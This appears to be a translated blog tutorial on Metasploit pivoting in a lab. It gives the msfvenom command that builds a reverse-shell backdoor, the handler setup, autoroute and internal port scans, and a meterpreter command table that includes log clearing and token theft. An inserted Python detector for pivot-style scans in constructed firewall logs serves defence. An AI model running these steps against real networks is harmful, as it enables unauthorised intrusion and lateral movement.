Pivot Attacks: Penetrating the Internal Network by Adding Routes in MSF


1 Metasploit pivot attack: how the route-addition method works

  • Pivoting is achieved through network-layer reachability: traffic for the new segment is routed through the compromised host's Meterpreter session.
  • Drawback: the conditions for use are restrictive (it only works inside Metasploit), and the traffic is easily blocked by a firewall.

2 Lab environment

[Figure: lab environment]

2.1 Establishing the meterpreter reverse connection

  1. Generate the Metasploit backdoor program

    msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe
    
  2. Configure Kali to listen for the meterpreter reverse connection

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.0.2
    run
    
  3. On the web server, download the Metasploit backdoor program and run it

  4. The meterpreter reverse connection is established


2.2 Inspecting the current system's information

  1. View the current system's routing information; a new network segment is found: 10.2.1.0/24

    ipconfig
    route list
    



  2. Add a route to that target network segment

    run post/multi/manage/autoroute
    run autoroute -p
    


    Inspect the added route; its next hop points to session 1.

2.3 Using the added route to scan hosts on the new segment

  • Scan with the MSF port-scan module

    use auxiliary/scanner/portscan/tcp
    set ports 135,139,445,23,80,8080
    set rhosts 10.2.1.1-10.2.1.3
    run
    


  • Nmap scan: the result shows the ports are filtered by the firewall

    db_nmap -sV -p23,80 10.2.1.3
    # If the database is not connected when scanning, run msfdb init first, then reopen msfconsole
    

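The firewall that filtered these ports also records the attempts, and from the defender's side a sweep driven through a pivot looks like one internal source touching many distinct (host, port) pairs within a short window. As an added example that is not part of the original post, the script below groups constructed firewall log lines by source and flags sources whose fan-out inside a sliding window reaches a threshold. The log format is a simplified one (not a real vendor format), 192.168.0.10 is the assumed address of the compromised web server acting as the pivot, 192.168.0.50 is a constructed benign client, and the window and threshold are illustrative.

```python
"""Spot pivot-style port sweeps in firewall logs (added example, not from the post).

A scan like the one above (10.2.1.1-10.2.1.3 on ports 135,139,445,23,80,8080)
shows up as one internal source hitting many distinct (dst, dport) pairs within
a short window. Log format, addresses and thresholds are constructed.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed log lines in a simplified "ts ACTION src= dst= dport=" format.
# 192.168.0.10 is the assumed pivot (compromised web server); 192.168.0.50 is benign.
SAMPLE_LOG = """\
2021-09-04T15:52:01 DENY src=192.168.0.10 dst=10.2.1.1 dport=135
2021-09-04T15:52:01 DENY src=192.168.0.10 dst=10.2.1.1 dport=139
2021-09-04T15:52:02 DENY src=192.168.0.10 dst=10.2.1.1 dport=445
2021-09-04T15:52:02 DENY src=192.168.0.10 dst=10.2.1.1 dport=23
2021-09-04T15:52:03 DENY src=192.168.0.10 dst=10.2.1.1 dport=80
2021-09-04T15:52:03 DENY src=192.168.0.10 dst=10.2.1.1 dport=8080
2021-09-04T15:52:04 ALLOW src=192.168.0.50 dst=10.2.1.3 dport=80
2021-09-04T15:52:05 DENY src=192.168.0.10 dst=10.2.1.2 dport=135
2021-09-04T15:52:05 DENY src=192.168.0.10 dst=10.2.1.2 dport=139
2021-09-04T15:52:06 DENY src=192.168.0.10 dst=10.2.1.2 dport=445
2021-09-04T15:52:06 DENY src=192.168.0.10 dst=10.2.1.2 dport=23
2021-09-04T15:52:07 DENY src=192.168.0.10 dst=10.2.1.2 dport=80
2021-09-04T15:52:07 DENY src=192.168.0.10 dst=10.2.1.2 dport=8080
2021-09-04T15:52:09 ALLOW src=192.168.0.50 dst=10.2.1.3 dport=80
2021-09-04T15:52:10 DENY src=192.168.0.10 dst=10.2.1.3 dport=135
2021-09-04T15:52:10 DENY src=192.168.0.10 dst=10.2.1.3 dport=139
2021-09-04T15:52:11 DENY src=192.168.0.10 dst=10.2.1.3 dport=445
2021-09-04T15:52:11 DENY src=192.168.0.10 dst=10.2.1.3 dport=23
2021-09-04T15:52:12 DENY src=192.168.0.10 dst=10.2.1.3 dport=80
2021-09-04T15:52:12 DENY src=192.168.0.10 dst=10.2.1.3 dport=8080
2021-09-04T15:52:15 ALLOW src=192.168.0.50 dst=10.2.1.3 dport=80
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ALLOW|DENY)\s+src=(?P<src>\S+)"
    r"\s+dst=(?P<dst>\S+)\s+dport=(?P<dport>\d+)$"
)


def parse_log(text):
    """Parse log text into event dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        ev["dport"] = int(ev["dport"])
        events.append(ev)
    return events


def detect_sweeps(events, window=timedelta(seconds=60), min_pairs=10):
    """Return {src: summary} for sources whose distinct (dst, dport) fan-out within
    any sliding window of length `window` reaches `min_pairs`. ALLOW and DENY both
    count: a sweep of filtered ports consists entirely of denies."""
    by_src = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_src[ev["src"]].append(ev)

    alerts = {}
    for src, evs in by_src.items():
        start = 0
        in_window = Counter()  # (dst, dport) -> hits currently inside the window
        for ev in evs:
            in_window[(ev["dst"], ev["dport"])] += 1
            # Slide the window start past events older than `window`.
            while ev["ts"] - evs[start]["ts"] > window:
                old = (evs[start]["dst"], evs[start]["dport"])
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            # Keep the window with the largest fan-out seen for this source.
            if len(in_window) >= min_pairs and len(in_window) > alerts.get(src, {}).get("pairs", 0):
                alerts[src] = {
                    "pairs": len(in_window),
                    "hosts": sorted({dst for dst, _ in in_window}),
                    "first_seen": evs[start]["ts"],
                    "last_seen": ev["ts"],
                }
    return alerts


if __name__ == "__main__":
    for src, info in detect_sweeps(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: {info['pairs']} (host,port) pairs across {len(info['hosts'])} hosts "
              f"between {info['first_seen']} and {info['last_seen']}")
```

Counting distinct (host, port) pairs rather than raw hits keeps a busy but legitimate client (many connections to one service) below the threshold while a sweep across several hosts and ports crosses it quickly; in a real deployment the threshold and window should be tuned against the segment's normal traffic.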

3 Basic meterpreter commands

Stdapi: Networking Commands
===========================
Command       Description
-------       -----------
arp           Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat       Display the network connections
portfwd       Forward a local port to a remote service
resolve       Resolve a set of host names on the target
route         View and modify the routing table

Stdapi: System Commands
=======================
Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process (raise privileges as far as possible)
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as (check the current user)
kill          Terminate a process
localtime     Displays the target system local date and time
pgrep         Filter processes by name
pkill         Terminate processes by name
ps            List running processes (list processes)
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS (view system information)
migrate       Migrate the server to another process (inject into another process)
getsystem     Attempt to elevate your privilege to that of local system. (elevate to local system privileges through various attack vectors)

Posted 2022-08-16 10:03 by f_carey